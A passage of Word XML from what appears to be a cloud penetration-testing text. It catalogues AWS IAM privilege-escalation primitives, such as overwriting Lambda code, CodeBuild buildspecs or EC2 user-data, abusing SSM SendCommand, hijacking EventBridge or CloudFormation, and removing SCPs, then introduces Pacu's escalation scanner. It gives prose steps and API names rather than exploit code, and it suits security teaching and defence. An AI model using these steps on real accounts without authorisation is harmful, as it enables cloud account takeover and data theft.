          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:TagRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:TagSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on itself or the resource. Tag yourself to match the condition and the policy admits the call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B483742" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.13  Primitive 13: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:UpdateFunctionCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7CD27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you cannot create a Lambda but can update an existing one whose role is privileged, replace its code with an exploit that runs with the role's permissions. Trigger it with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:InvokeFunction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or wait for its next scheduled invocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA20F71" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.14  Primitive 14: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:AddPermission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13374C7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Add an invoke-permission to a privileged Lambda that lets you call it from a public source or your own account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7CAEEB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.15  Primitive 15: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>codebuild:UpdateProject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartBuild</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094F50B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Modify the build specification of an existing CodeBuild project whose service role is privileged, then kick a build. The build's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>buildspec.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs arbitrary commands as the service role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D8C3DD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.16  Primitive 16: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on an EC2 with a privileged instance profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DEDC6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Use Systems Manager to execute commands on an existing EC2 instance whose instance profile has elevated permissions. The EC2 invokes the commands as its profile role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B99968" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.17  Primitive 17: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>glue:UpdateDevEndpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with injected SSH key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3F03A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Glue development endpoint runs as a role. Updating its SSH public key (if permitted) gives the operator a shell on the endpoint, running as the role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7BBB1E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.18  Primitive 18: CloudFormation stack-drift takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6303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you can modify a CloudFormation stack template and the stack is managed by a privileged service role, inserting a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Custom::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> resource pointed at an attacker-controlled Lambda yields RCE as the CFN role on next update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123457F2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.19  Primitive 19: EC2 user-data overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E8799" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ec2:ModifyInstanceAttribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UserData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a stopped instance, followed by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartInstances</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, executes arbitrary userdata on boot as the instance's role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1744EAA0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.20  Primitive 20: Systems Manager parameter / Secrets Manager replacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9C14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a privileged workload reads a configuration value from SSM Parameter Store or Secrets Manager, and your principal can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutParameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutSecretValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, replacing the value with attacker-controlled content (a malicious endpoint, a SQL statement, a command string) is remote code injection via data path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8DA19" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.21  Primitive 21: EventBridge rule hijack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3BCF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Rewrite an existing EventBridge rule's target to a Lambda you control, then wait for the triggering event (or generate one). The Lambda runs with the rule's invocation role or the target's execution role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5735E976" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.22  Primitive 22: S3 bucket notification to attacker Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A2C8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a privileged Lambda is triggered by S3 object creation, and you can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutBucketNotificationConfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, re-route the notification to your own function or cascade an attacker-controlled pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A4C7F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.23  Primitive 23: Step Functions state-machine rewrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7572BD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>states:UpdateStateMachine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes the machine's definition; subsequent executions run as the machine's role against attacker-chosen services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF84E4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.24  Primitive 24: IAM Identity Center permission-set escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59FC9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your principal can modify an Identity Center permission set and attach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AdministratorAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, every user currently assigned that permission set gains admin on their next sign-in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B0312" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.25  Primitive 25: KMS grant to external principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF18C72" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:CreateGrant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be called without grant-management permissions in some conditions; a grant to an attacker-controlled role lets them decrypt anything encrypted under that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5F97B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.26  Primitive 26: VPC endpoint policy relaxation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660DE7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Relaxing a VPC endpoint policy turns an enforced-via-network-boundary restriction into a permissive one. Works only when the identity policy would otherwise allow — useful in defense-in-depth environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D445686" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.27  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Primitive 27: Organizations SCP removal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B828D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your principal has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>organizations:DetachPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, removing a restrictive SCP expands every child account's effective permissions. Loudest primitive imaginable — applies across the entire org.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103E254" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.28  Primitive 28: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on an over-wide target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E6DA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variant of primitive 7: if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on your identity policy is scoped </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Resource: *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, you can pass any role to any service. This is the configuration that should never exist but still appears in customer-managed policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91A844" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.29  Primitive 29: IAM Identity Center session-tag injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0F13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the target uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws:PrincipalTag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> in ABAC and the IdP passes a user-controlled attribute as a session tag, compromising the user's IdP profile (e.g., Okta profile editor) lets you assume the session tag that grants access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716209B7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.30  Primitive 30: Service-linked role abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BA9B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Service-linked roles (SLR) are pre-provisioned, service-specific roles. A few services (CloudFormation, Config, Auto Scaling) have SLRs with wider permissions than their name suggests. A principal that can invoke the service in the right shape causes the SLR to act on its behalf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154BA608" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.31  Primitive 31: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to AutoScaling launch template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D49B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newer variant: modify an EC2 Launch Template's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>IamInstanceProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> reference, then trigger an Auto Scaling group refresh. New instances launch with an attacker-chosen role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E72A06A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.32  Pacu's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam__privesc_scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80EAA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Pacu implements automated scanning for the primitives above. It reads the current principal's permissions, checks each primitive's prerequisites, and — in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode — actually performs the escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B71B73"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(demo:cgkitten) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
